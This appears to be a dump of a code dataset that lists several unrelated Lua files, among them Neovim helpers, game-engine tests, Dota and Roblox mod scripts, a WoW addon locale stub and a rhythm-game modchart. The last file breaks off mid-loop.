content stringlengths 5 1.05M |
|---|
local utils = {}
local api = vim.api
utils.map = function(key)
-- get the extra options
local opts = { noremap = true, silent = true }
for i, v in pairs(key) do
if type(i) == "string" then
opts[i] = v
end
end
-- basic support for buffer-scoped keybindings
local buffer = opts.buffer
opts.buffer = nil
if buffer then
api.nvim_buf_set_keymap(0, key[1], key[2], key[3], opts)
else
api.nvim_set_keymap(key[1], key[2], key[3], opts)
end
end
utils.create_augroups = function(definitions)
for group_name, definition in pairs(definitions) do
api.nvim_command("augroup " .. group_name)
api.nvim_command "autocmd!"
for _, def in ipairs(definition) do
-- if type(def) == 'table' and type(def[#def]) == 'function' then
-- def[#def] = lua_callback(def[#def])
-- end
local command = table.concat(vim.tbl_flatten { "autocmd", def }, " ")
api.nvim_command(command)
end
api.nvim_command "augroup END"
end
end
return utils
|
--[[
A simple test to figure out what the raw switching cost is for
the scheduler. Set a high frame rate until you're satisfied it's
fast enough for your needs.
With a framerate of 1,000, we are able to switch between
tasks with only 1ms spent within the tasks. If you're trying
to maintain something like 30 frames per second, it's likely
that your own tasks will be taking up the bulk of the time, not
the raw task switch cost.
]]
local sched = require("scheduler")
local frameCount = 0
local frameRate = 1000
local function counter()
frameCount = frameCount+1
if frameCount == 5*frameRate then
halt()
end
end
local function main()
periodic(1000/frameRate, counter)
end
run(main)
print("Run Time: ", runningTime())
print("Fixed Rate: ", frameRate)
print("Frame Count: ", frameCount)
print("Runtime Rate: ", frameCount/runningTime())
|
local mock_time = require("deftest.mock.time")
local mock = require("deftest.mock.mock")
local time_string = require("eva.libs.time_string")
local const = require("eva.const")
local eva = require("eva.eva")
local luax = require("eva.luax")
local function set_time(iso_time)
local time = time_string.parse_ISO(iso_time)
mock_time.set(time)
eva.update(1)
return time
end
local START = const.EVENT.FESTIVAL_START
local END = const.EVENT.FESTIVAL_END
local events = {
[START] = function() end,
[END] = function() end
}
return function()
describe("Eva Festivals", function()
before(function()
eva.init("/resources/tests/eva_tests.json")
mock.mock(events)
eva.events.subscribe_map(events)
mock_time.mock()
end)
after(function()
mock_time.unmock()
mock.unmock(events)
end)
it("Should return correct start time (repeat festivals too)", function()
-- event_festivals start at 2019-10-20, end after 14d
-- weekly_festival start at 2019-10-07, end after 24h, every 7D
local current_time = set_time("2019-10-05Z")
local to_start = eva.festivals.get_start_time("event_festival")
assert((to_start - current_time) == 60 * 60 * 24 * 15)
local to_start_weekly = eva.festivals.get_start_time("weekly_festival")
assert((to_start_weekly - current_time) == 60 * 60 * 24 * 2)
current_time = set_time("2019-10-07T12:00:00Z")
to_start_weekly = eva.festivals.get_start_time("weekly_festival")
assert((to_start_weekly - current_time) == -60 * 60 * 12)
current_time = set_time("2019-10-09Z")
to_start_weekly = eva.festivals.get_start_time("weekly_festival")
assert((to_start_weekly - current_time) == 60 * 60 * 24 * 5)
current_time = set_time("2019-10-25Z")
to_start = eva.festivals.get_start_time("event_festival")
assert((to_start - current_time) == 60 * 60 * 24 * -5)
to_start_weekly = eva.festivals.get_start_time("weekly_festival")
assert((to_start_weekly - current_time) == 60 * 60 * 24 * 3)
end)
it("Should return correct end time", function()
local current_time = set_time("2019-10-05Z")
local to_end = eva.festivals.get_end_time("event_festival")
assert((to_end - current_time) == 60 * 60 * 24 * (15 + 14))
local to_end_weekly = eva.festivals.get_end_time("weekly_festival")
assert((to_end_weekly - current_time) == ((60 * 60 * 24 * 2) + (60 * 60 * 24)))
current_time = set_time("2019-10-07T10:00:00Z")
to_end_weekly = eva.festivals.get_end_time("weekly_festival")
assert((to_end_weekly - current_time) == 60 * 60 * 14)
current_time = set_time("2019-10-22Z")
to_end = eva.festivals.get_end_time("event_festival")
assert((to_end - current_time) == 60 * 60 * 24 * 12)
to_end_weekly = eva.festivals.get_end_time("weekly_festival")
assert((to_end_weekly - current_time) == 60 * 60 * 24 * (6+1))
current_time = set_time("2019-11-10Z")
to_end = eva.festivals.get_end_time("event_festival")
-- 3600 is due of timezone problem? can I fix it?
assert(math.abs((to_end - current_time) - 60 * 60 * 24 * -7) <= 3600)
end)
it("Should correct start and end festival", function()
set_time("2019-10-05Z")
assert(not eva.festivals.is_active("event_festival"))
assert(not eva.festivals.is_active("weekly_festival"))
assert(events[START].calls == 0)
local completed = eva.festivals.get_completed()
assert(not luax.table.contains(completed, "weekly_festival"))
assert(not luax.table.contains(completed, "event_festival"))
local current = eva.festivals.get_current()
assert(not luax.table.contains(current, "weekly_festival"))
assert(not luax.table.contains(current, "event_festival"))
set_time("2019-10-07T10:00:00Z")
assert(not eva.festivals.is_active("event_festival"))
assert(eva.festivals.is_active("weekly_festival"))
assert(events[START].calls == 1)
assert(events[START].params[1].id == "weekly_festival")
set_time("2019-10-21T8:00:00Z")
assert(eva.festivals.is_active("event_festival"))
assert(not eva.festivals.is_active("weekly_festival"))
assert(eva.festivals.is_completed("weekly_festival"))
assert(events[START].calls == 2)
assert(events[END].calls == 1)
set_time("2019-11-10T8:00:00Z")
assert(not eva.festivals.is_active("event_festival"))
assert(not eva.festivals.is_active("weekly_festival"))
assert(eva.festivals.is_completed("event_festival"))
assert(events[START].calls == 2)
assert(events[END].calls == 2)
assert(events[END].params[1].id == "event_festival")
set_time("2019-11-11T8:00:00Z")
assert(not eva.festivals.is_active("event_festival"))
assert(eva.festivals.is_completed("event_festival"))
assert(eva.festivals.is_active("weekly_festival"))
assert(eva.festivals.is_completed("weekly_festival"))
assert(events[END].calls == 2)
assert(events[START].calls == 3)
assert(events[START].params[1].id == "weekly_festival")
completed = eva.festivals.get_completed()
assert(luax.table.contains(completed, "weekly_festival"))
assert(luax.table.contains(completed, "event_festival"))
current = eva.festivals.get_current()
assert(luax.table.contains(current, "weekly_festival"))
assert(not luax.table.contains(current, "event_festival"))
end)
it("Should not start before the end", function()
set_time("2019-10-19Z")
assert(not eva.festivals.is_active("event_festival"))
set_time("2019-11-01Z")
assert(not eva.festivals.is_active("event_festival"))
assert(events[START].calls == 0)
end)
it("Should not enable, if festival end until player is offline", function()
set_time("2019-10-19Z")
assert(not eva.festivals.is_active("event_festival"))
set_time("2019-11-10Z")
assert(not eva.festivals.is_active("event_festival"))
assert(events[START].calls == 0)
end)
it("Should have custom logic to start festivals", function()
local is_need_start = false
local settings = {
is_can_start = function(festival_id)
return is_need_start
end
}
eva.festivals.set_settings(settings)
set_time("2019-10-05Z")
assert(not eva.festivals.is_active("event_festival"))
set_time("2019-10-21T8:00:00Z")
assert(not eva.festivals.is_active("event_festival"))
is_need_start = true
set_time("2019-10-21T8:20:00Z")
assert(eva.festivals.is_active("event_festival"))
end)
it("Should have custom callbacks on start/end festivals", function()
local settings = {
on_festival_start = function() end,
on_festival_end = function() end
}
mock.mock(settings)
eva.festivals.set_settings(settings)
set_time("2019-10-05Z")
assert(not eva.festivals.is_active("event_festival"))
assert(not eva.festivals.is_active("weekly_festival"))
assert(events[START].calls == 0)
set_time("2019-10-07T10:00:00Z")
assert(settings.on_festival_start.calls == 1)
assert(settings.on_festival_end.calls == 0)
set_time("2019-10-21T8:00:00Z")
assert(settings.on_festival_start.calls == 2)
assert(settings.on_festival_end.calls == 1)
set_time("2019-11-10T8:00:00Z")
assert(settings.on_festival_start.calls == 2)
assert(settings.on_festival_end.calls == 2)
end)
it("Should be enabled and disabled via debug, without time conditions", function()
set_time("2019-10-05Z")
assert(not eva.festivals.is_active("event_festival"))
assert(not eva.festivals.is_active("weekly_festival"))
eva.debug.start_festival("weekly_festival")
assert(not eva.festivals.is_active("event_festival"))
assert(eva.festivals.is_active("weekly_festival"))
eva.debug.start_festival("event_festival")
eva.debug.end_festival("weekly_festival")
assert(eva.festivals.is_active("event_festival"))
assert(not eva.festivals.is_active("weekly_festival"))
eva.debug.end_festival("event_festival")
assert(not eva.festivals.is_active("event_festival"))
assert(not eva.festivals.is_active("weekly_festival"))
end)
end)
end
|
-----------------------------------
-- Area: Monastic Cavern
-- NM: Orcish Overlord
-- Note: PH for Overlord Bakgodek
-- TODO: messages should be zone-wide
-----------------------------------
local ID = require("scripts/zones/Monastic_Cavern/IDs")
mixins = {require("scripts/mixins/job_special")}
require("scripts/globals/status")
-----------------------------------
function onMobInitialize(mob)
-- the quest version of this NM doesn't drop gil
if mob:getID() >= ID.mob.UNDERSTANDING_OVERLORD_OFFSET then
mob:setMobMod(tpz.mobMod.GIL_MAX, -1)
end
end
function onMobEngaged(mob, target)
mob:showText(mob, ID.text.ORCISH_OVERLORD_ENGAGE)
end
function onMobDeath(mob, player, isKiller)
if isKiller then
mob:showText(mob, ID.text.ORCISH_OVERLORD_DEATH)
end
end
function onMobDespawn(mob)
local nqId = mob:getID()
-- the quest version of this NM doesn't respawn or count toward hq nm
if nqId == ID.mob.ORCISH_OVERLORD then
local hqId = mob:getID() + 1
local ToD = GetServerVariable("[POP]Overlord_Bakgodek")
local kills = GetServerVariable("[PH]Overlord_Bakgodek")
local popNow = (math.random(1, 5) == 3 or kills > 6)
if os.time() > ToD and popNow then
DisallowRespawn(nqId, true)
DisallowRespawn(hqId, false)
UpdateNMSpawnPoint(hqId)
GetMobByID(hqId):setRespawnTime(math.random(75600, 86400))
else
UpdateNMSpawnPoint(nqId)
mob:setRespawnTime(math.random(75600, 86400))
SetServerVariable("[PH]Overlord_Bakgodek", kills + 1)
end
end
end
|
--// services
local LoadLibrary = require(game:GetService('ReplicatedStorage'):WaitForChild('PlayingCards'))
local Services = setmetatable({}, {__index = function(cache, serviceName)
cache[serviceName] = game:GetService(serviceName)
return cache[serviceName]
end})
--// functions
local Initialize = script.Parent
local InitClient = Initialize:FindFirstChild('InitClient')
if InitClient then
InitClient.Parent = Services['StarterPlayer']['StarterPlayerScripts']
InitClient.Disabled = false
Initialize:Destroy()
LoadLibrary('DiceOutput')
end |
local answerModule = require "module.answerModule"
local ItemHelper= require"utils.ItemHelper"
local timeModule = require "module.Time"
local matching = {}
function matching:Start(data)
self:initData(data)
self:initUi()
end
function matching:initData(data)
self.index = data and data.index or 1
self.queryTypeFlag = false
end
function matching:initUi()
self.view = CS.SGK.UIReference.Setup(self.gameObject)
self:initScrollView()
self:initTop()
self:initBtn()
end
function matching:initTop()
self.matchingText = self.view.matchingRoot.matchingText.gameObject
end
function matching:initBtn()
CS.UGUIClickEventListener.Get(self.view.matchingRoot.matchingBtn.gameObject).onClick = function()
if self.queryTypeFlag then
self.matchingText:SetActive(true)
DispatchEvent("LOCAL_WEEKANSWER_MATCHING_START", {index = 1, time = timeModule.now()})
answerModule.Matching(self.index or 1)
self.view.matchingRoot.matchingBtn:SetActive(false)
self.view.matchingRoot.unMatchingBtn:SetActive(true)
else
showDlgError(nil, "请先选择题目类型")
end
end
CS.UGUIClickEventListener.Get(self.view.matchingRoot.unMatchingBtn.gameObject).onClick = function()
self.matchingText:SetActive(false)
DispatchEvent("LOCAL_WEEKANSWER_MATCHING_STOP")
answerModule.CancelMatch()
self.view.matchingRoot.matchingBtn:SetActive(true)
self.view.matchingRoot.unMatchingBtn:SetActive(false)
end
end
function matching:OnDestroy()
if self.view.matchingRoot.unMatchingBtn.activeSelf and not answerModule.GetTeamStatus() then
answerModule.CancelMatch()
showDlgError(nil, "匹配已取消,请重新匹配")
end
end
function matching:initScrollView()
self.ScrollView = self.view.matchingRoot.ScrollView[CS.UIMultiScroller]
self.ScrollView.RefreshIconCallback = function (obj,idx)
local _view = CS.SGK.UIReference.Setup(obj)
local _tab = answerModule.GetWeekReward()[idx + 1]
utils.IconFrameHelper.Create(_view.IconFrame, {id = _tab.id, type = _tab.type, showDetail = true, count = _tab.value})
obj.gameObject:SetActive(true)
end
self.ScrollView.DataCount = #answerModule.GetWeekReward()
end
function matching:listEvent()
return {
"LOCAL_WEEKANSWER_TYPEID_CHANGE",
}
end
function matching:onEvent(event, data)
if event == "LOCAL_WEEKANSWER_TYPEID_CHANGE" then
self.index = data
self.queryTypeFlag = true
end
end
return matching
|
beastmaster_call_of_the_wild_boar_oaa = class(AbilityBaseClass)
function beastmaster_call_of_the_wild_boar_oaa:OnSpellStart()
local caster = self:GetCaster()
local playerID = caster:GetPlayerID()
local abilityLevel = self:GetLevel()
local duration = self:GetSpecialValueFor("duration")
self:SpawnBoar(caster, playerID, abilityLevel, duration)
-- if abilityLevel > 3 then
-- local npcCreepList = {
-- "npc_dota_neutral_alpha_wolf",
-- "npc_dota_neutral_centaur_khan",
-- "npc_dota_neutral_dark_troll_warlord",
-- "npc_dota_neutral_polar_furbolg_ursa_warrior",
-- "npc_dota_neutral_satyr_hellcaller"
-- }
-- local levelUnitName = npcCreepList[RandomInt(1, 5)]
-- local npcCreep = self:SpawnUnit(levelUnitName, caster, playerID, abilityLevel, duration, false)
-- end
end
function beastmaster_call_of_the_wild_boar_oaa:OnUpgrade()
local abilityLevel = self:GetLevel()
local hawk_ability = self:GetCaster():FindAbilityByName("beastmaster_call_of_the_wild_hawk_oaa")
-- Check to not enter a level up loop
if hawk_ability and hawk_ability:GetLevel() ~= abilityLevel then
hawk_ability:SetLevel(abilityLevel)
end
end
function beastmaster_call_of_the_wild_boar_oaa:SpawnBoar(caster, playerID, abilityLevel, duration)
local baseUnitName = "npc_dota_beastmaster_boar"
local levelUnitName = baseUnitName .. "_" .. abilityLevel
-- Spawn boar and orient it to face the same way as the caster
local boar = self:SpawnUnit(levelUnitName, caster, playerID, abilityLevel, duration, false)
boar:AddNewModifier(caster, self, "modifier_beastmaster_boar_poison", {})
-- Level the boar's poison ability to match abilityLevel
local boarPoisonAbility = boar:FindAbilityByName("beastmaster_boar_poison")
if boarPoisonAbility then
boarPoisonAbility:SetLevel(abilityLevel)
end
-- Create particle effects
local particleName = "particles/units/heroes/hero_beastmaster/beastmaster_call_boar.vpcf"
local particle1 = ParticleManager:CreateParticle(particleName, PATTACH_CUSTOMORIGIN, caster)
ParticleManager:SetParticleControl(particle1, 0, boar:GetOrigin())
ParticleManager:ReleaseParticleIndex(particle1)
caster:EmitSound("Hero_Beastmaster.Call.Boar")
end
function beastmaster_call_of_the_wild_boar_oaa:SpawnUnit(levelUnitName, caster, playerID, abilityLevel, duration, bRandomPosition)
local position = caster:GetOrigin();
if bRandomPosition then
position = position + RandomVector(1):Normalized() * RandomFloat(50, 100)
end
local npcCreep = CreateUnitByName(levelUnitName, position, true, caster, caster:GetOwner(), caster:GetTeam())
npcCreep:SetControllableByPlayer(playerID, false)
npcCreep:SetOwner(caster)
npcCreep:SetForwardVector(caster:GetForwardVector())
npcCreep:AddNewModifier(caster, self, "modifier_kill", {duration = duration})
return npcCreep
end
beastmaster_call_of_the_wild_hawk_oaa = class(AbilityBaseClass)
LinkLuaModifier( "modifier_hawk_invisibility_oaa", "abilities/oaa_call_of_the_wild.lua", LUA_MODIFIER_MOTION_NONE )
function beastmaster_call_of_the_wild_hawk_oaa:OnSpellStart()
local caster = self:GetCaster()
local playerID = caster:GetPlayerID()
local abilityLevel = self:GetLevel()
local duration = self:GetSpecialValueFor("duration")
self:SpawnHawk(caster, playerID, abilityLevel, duration, 1)
end
function beastmaster_call_of_the_wild_hawk_oaa:SpawnHawk(caster, playerID, abilityLevel, duration, number_of_hawks)
local unit_name = "npc_dota_beastmaster_hawk_oaa"
local hawk_hp = self:GetLevelSpecialValueFor("hawk_hp", abilityLevel-1)
local hawk_armor = self:GetLevelSpecialValueFor("hawk_armor", abilityLevel-1)
local hawk_speed = self:GetLevelSpecialValueFor("hawk_speed", abilityLevel-1)
local hawk_vision = self:GetLevelSpecialValueFor("hawk_vision", abilityLevel-1)
local hawk_magic_resistance = self:GetLevelSpecialValueFor("hawk_magic_resistance", abilityLevel-1)
local hawk_gold_bounty = self:GetLevelSpecialValueFor("hawk_gold_bounty", abilityLevel-1)
if caster:HasShardOAA() then
hawk_magic_resistance = 100
end
for i = 1, number_of_hawks do
-- Spawn hawk and orient it to face the same way as the caster
local hawk = self:SpawnUnit(unit_name, caster, playerID, abilityLevel, duration, true)
-- Create particle effects
local particleName = "particles/units/heroes/hero_beastmaster/beastmaster_call_bird.vpcf"
local particle1 = ParticleManager:CreateParticle(particleName, PATTACH_CUSTOMORIGIN, caster)
ParticleManager:SetParticleControl(particle1, 0, hawk:GetOrigin())
ParticleManager:ReleaseParticleIndex(particle1)
-- Invisibility buff
hawk:AddNewModifier(caster, self, "modifier_hawk_invisibility_oaa", {})
-- Fix stats of hawks
-- HP
hawk:SetBaseMaxHealth(hawk_hp)
hawk:SetMaxHealth(hawk_hp)
hawk:SetHealth(hawk_hp)
-- ARMOR
hawk:SetPhysicalArmorBaseValue(hawk_armor)
-- MOVEMENT SPEED
hawk:SetBaseMoveSpeed(hawk_speed)
-- VISION
hawk:SetDayTimeVisionRange(hawk_vision)
hawk:SetNightTimeVisionRange(hawk_vision)
-- Magic Resistance
hawk:SetBaseMagicalResistanceValue(hawk_magic_resistance)
-- GOLD BOUNTY
hawk:SetMaximumGoldBounty(hawk_gold_bounty)
hawk:SetMinimumGoldBounty(hawk_gold_bounty)
if caster:HasShardOAA() then
local dive_bomb = hawk:AddAbility("beastmaster_hawk_dive_oaa")
dive_bomb:SetLevel(1)
end
end
caster:EmitSound("Hero_Beastmaster.Call.Hawk")
end
function beastmaster_call_of_the_wild_hawk_oaa:SpawnUnit(levelUnitName, caster, playerID, abilityLevel, duration, bRandomPosition)
local position = caster:GetOrigin();
if bRandomPosition then
position = position + RandomVector(1):Normalized() * RandomFloat(50, 100)
end
local npcCreep = CreateUnitByName(levelUnitName, position, true, caster, caster:GetOwner(), caster:GetTeam())
npcCreep:SetControllableByPlayer(playerID, false)
npcCreep:SetOwner(caster)
npcCreep:SetForwardVector(caster:GetForwardVector())
npcCreep:AddNewModifier(caster, self, "modifier_kill", {duration = duration})
return npcCreep
end
--------------------------------------------------------------------------------
modifier_hawk_invisibility_oaa = class( ModifierBaseClass )
--------------------------------------------------------------------------------
function modifier_hawk_invisibility_oaa:IsHidden()
return true
end
function modifier_hawk_invisibility_oaa:IsDebuff()
return false
end
function modifier_hawk_invisibility_oaa:IsPurgable()
return false
end
function modifier_hawk_invisibility_oaa:OnCreated()
local particle = ParticleManager:CreateParticle("particles/generic_hero_status/status_invisibility_start.vpcf", PATTACH_ABSORIGIN, self:GetParent())
ParticleManager:ReleaseParticleIndex(particle)
end
function modifier_hawk_invisibility_oaa:DeclareFunctions()
local funcs = { MODIFIER_PROPERTY_INVISIBILITY_LEVEL, }
return funcs
end
function modifier_hawk_invisibility_oaa:GetModifierInvisibilityLevel()
if IsClient() then
return 1
end
end
function modifier_hawk_invisibility_oaa:CheckState()
if IsServer() then
local state = { [MODIFIER_STATE_INVISIBLE] = true}
return state
end
end
function modifier_hawk_invisibility_oaa:GetPriority()
return MODIFIER_PRIORITY_ULTRA
end
|
MiDKP = MiDKP or {} local M = MiDKP M.Locale = {} function M.Locale:NewLocale(locale,default) local l = {} M.Locale[locale] = l --[[ if default then M.Locale.Default = l setmetatable(M.Locale.Default,{__index = function(t,index) if not t[index] then return index else return t[index] end end}) end]] return l end function M.Locale:GetLocale(locale) if not self[locale] then return self.Default end return self[locale] end
|
function start (song)
setCamZoom(1)
setHudZoom(2)
showOnlyStrums = true
strumLine1Visible = false
strumLine2Visible = false
end
function update (elapsed)
if curStep == 5 then
setHudZoom(1)
end
if curStep == 100 then
setHudZoom(2)
end
if curStep == 120 then
strumLine1Visible = true
end
if curStep == 130 then
strumLine2Visible = true
end
if curStep == 170 then
setCamZoom(1.7)
end
if curStep == 200 then
setCamZoom(1.7)
end
if curStep == 270 then
setCamZoom(1.7)
end
if curStep == 300 then
setCamZoom(1.7)
end
if curStep == 350 then
setCamZoom(1.7)
end
if curStep == 400 then
setCamZoom(1.7)
end
if curStep == 576 then
setCamZoom(1.7)
showOnlyStrums = true
end
if curStep == 580 then
setCamZoom(1.7)
end
if curStep == 650 then
setCamZoom(1.7)
end
if curStep == 700 then
setCamZoom(1.7)
end
if curStep == 750 then
setCamZoom(1.7)
end
if curStep == 880 then
setCamZoom(0.4)
end
if curStep == 895 then
setCamZoom(1)
end
if curStep == 896 then
setCamZoom(1.7)
end
if curStep == 898 then
setCamZoom(1.7)
end
if curStep == 980 then
setCamZoom(1.7)
end
if curStep == 1000 then
setCamZoom(1.7)
end
if curStep == 1100 then
setCamZoom(1.7)
end
if curStep == 1200 then
setCamZoom(1.7)
end
if curStep == 1280 then
setCamZoom(1.7)
end
if curStep == 1282 then
setCamZoom(1.7)
end
if curStep == 1288 then
setCamZoom(0.4)
end
if curStep == 1290 then
showOnlyStrums = true
end
if curStep == 1350 then
setCamZoom(1.7)
end
if curStep == 1400 then
setCamZoom(1.7)
end
if curStep == 1450 then
setCamZoom(1.7)
end
if curStep == 1500 then
setCamZoom(1.7)
end
if curStep == 1600 then
setCamZoom(1.7)
end
if curStep == 1650 then
setCamZoom(1.7)
end
if curStep == 1700 then
setCamZoom(1.7)
end
if curStep == 1750 then
setCamZoom(1.7)
end
if curStep == 1800 then
setCamZoom(1.7)
end
if curStep == 1850 then
setCamZoom(1.7)
end
if curStep == 1900 then
setCamZoom(1.7)
end
if curStep == 1950 then
setCamZoom(1.7)
end
if curStep == 2000 then
setCamZoom(1.7)
end
if curStep == 2150 then
setCamZoom(1.7)
end
if curStep == 2220 then
setCamZoom(1.7)
end
if curStep == 2350 then
setCamZoom(1.7)
end
if curStep == 2400 then
setCamZoom(1.7)
end
if curStep == 2450 then
setCamZoom(1.7)
end
if curStep == 2500 then
setCamZoom(1.7)
end
if curStep == 2550 then
setCamZoom(1.7)
end
if curStep == 2600 then
setCamZoom(1.7)
end
if curStep == 2650 then
setCamZoom(1.7)
end
if curStep == 2750 then
setCamZoom(1.7)
end
if curStep == 2800 then
setCamZoom(1.7)
end
if curStep == 2900 then
setCamZoom(1.7)
end
if curStep == 2950 then
setCamZoom(1.7)
end
if curStep == 3000 then
setCamZoom(1.7)
end
if curStep == 3100 then
setCamZoom(1.7)
end
if curStep == 3700 then
setCamZoom(1.7)
end
if curStep == 3750 then
setCamZoom(1.7)
end
if curStep == 3800 then
setCamZoom(1.7)
end
if curStep == 3900 then
setCamZoom(1.7)
end
if curStep == 4007 then
setCamZoom(1.7)
end
if curStep == 4100 then
setCamZoom(1.7)
end
if curStep == 4150 then
setCamZoom(1.7)
end
if curStep == 4200 then
setCamZoom(1.7)
end
if curStep == 4250 then
setCamZoom(1.7)
end
if curStep == 4300 then
setCamZoom(1.7)
end
if curStep == 4350 then
setCamZoom(1.7)
end
if curStep == 4450 then
setCamZoom(1.7)
end
if curStep == 4500 then
setCamZoom(1.7)
end
if curStep >= 384 and curStep < 447 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=0,5 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if curStep >= 450 and curStep < 600 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=0,5 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if curStep >= 767 and curStep < 895 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=6,12 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if curStep >= 895 and curStep < 1007 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=0,5 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if curStep >= 1151 and curStep < 1225 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=6,12 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if difficulty == 575 and curStep < 766 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=0,12 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if difficulty == 766 and curStep < 894 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=0,5 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if difficulty == 895 and curStep < 1250 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=6,12 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if difficulty == 1300 and curStep < 1500 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=0,12 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if curStep >= 1500 and curStep < 2000 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=0,5 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if curStep >= 2000 and curStep < 2500 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=0,5 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if curStep >= 2500 and curStep < 3000 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=6,12 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if curStep >= 3000 and curStep < 3500 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=0,5 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if curStep >= 3500 and curStep < 4000 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=6,12 do
setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if difficulty == 4000 and curStep < 4500 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=0,12 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if difficulty == 4500 and curStep < 5000 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=0,5 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if difficulty == 5000 and curStep < 5500 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=6,12 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if difficulty == 5500 and curStep < 6000 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=0,12 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if curStep >= 2000 and curStep < 4600 then
local currentBeat = (songPos / 1000)*(bpm/120)
for i=0,5 do
